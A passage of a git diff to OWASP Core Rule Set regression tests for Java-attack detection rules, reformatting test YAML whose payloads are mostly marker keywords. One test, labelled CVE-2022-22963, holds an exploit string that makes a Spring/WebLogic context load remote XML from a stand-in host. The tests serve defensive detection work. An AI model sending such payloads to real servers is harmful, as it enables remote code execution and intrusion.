log_contains: "id \"944240\"" + - test_id: 86 desc: "Content-Type text/plain includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_id: 87 desc: "Content-Type application/json arg value includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.whileclosure\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.whileclosure\"}" + output: + log_contains: "id \"944240\"" + - test_id: 88 desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.whileclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.whileclosure\": \"test\"}" + output: + log_contains: "id \"944240\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml index b8b744b16..e01631dc0 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml 
@@ -1,453 +1,430 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944250.yaml" description: "Positive tests for rule 944250" +rule_id: 944250 tests: - - test_title: 944250-1 + - test_id: 1 desc: "Argument test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_id: 2 desc: "Argument name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime=test" - output: - log_contains: "id \"944250\"" - - test_title: 944250-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime=test" + output: + log_contains: "id \"944250\"" + - test_id: 3 desc: "Cookie test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_id: 4 desc: "Cookie name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.runtime=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.runtime=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_id: 5 desc: "Request header test includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_id: 6 desc: "XML attribute value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_id: 7 desc: "XML element value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_id: 8 desc: "Nested XML element value includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_id: 9 desc: "Content-Type text/plain includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.runtime" - output: - log_contains: "id \"944250\"" - - test_title: 944250-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_id: 10 desc: "Content-Type application/json arg value includes keyword 
java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.runtime\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.runtime\"}" + output: + log_contains: "id \"944250\"" + - test_id: 11 desc: "Content-Type application/json arg name includes keyword java.evil.runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.evil.runtime\": \"test\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: 
"HTTP/1.0" + data: "{\"java.evil.runtime\": \"test\"}" + output: + log_contains: "id \"944250\"" + - test_id: 12 desc: "Argument test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_id: 13 desc: "Argument name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder=test" - output: - log_contains: "id \"944250\"" - - test_title: 944250-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder=test" + output: + log_contains: "id \"944250\"" + - test_id: 14 desc: "Cookie test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.evil.processbuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.processbuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_id: 15 desc: "Cookie name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.evil.processbuilder=test - method: "POST" - 
uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.processbuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_id: 16 desc: "Request header test includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.evil.processbuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.processbuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_id: 17 desc: "XML attribute value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944250\"" - - test_title: 944250-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_id: 18 desc: "XML element value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_id: 19 desc: "Nested XML element value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - 
port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_id: 20 desc: "Content-Type text/plain includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - test_title: 944250-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_id: 21 desc: 
"Content-Type application/json arg value includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.processbuilder\"}" - output: - log_contains: "id \"944250\"" - - test_title: 944250-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.processbuilder\"}" + output: + log_contains: "id \"944250\"" + - test_id: 22 desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.evil.processbuilder\": \"test\"}" - output: - log_contains: "id \"944250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"java.evil.processbuilder\": \"test\"}"
+ output:
+ log_contains: "id \"944250\""
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml
index 144d3f52a..82eaddb4e 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml
@@ -1,41 +1,38 @@
---
meta:
author: "theMiddle, azurit"
- enabled: true
- name: "944260.yaml"
description: "Positive tests for rule 944260"
+rule_id: 944260
tests:
- - test_title: 944260-1
+ - test_id: 1
desc: "CVE-2022-22963"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.1"
- data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')"
- output:
- log_contains: "id \"944260\""
- - test_title: 944260-2
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.1"
+ data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')"
+ output:
+ log_contains: "id \"944260\""
+ - test_id: 2
desc: "Spring Framework RCE"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.1"
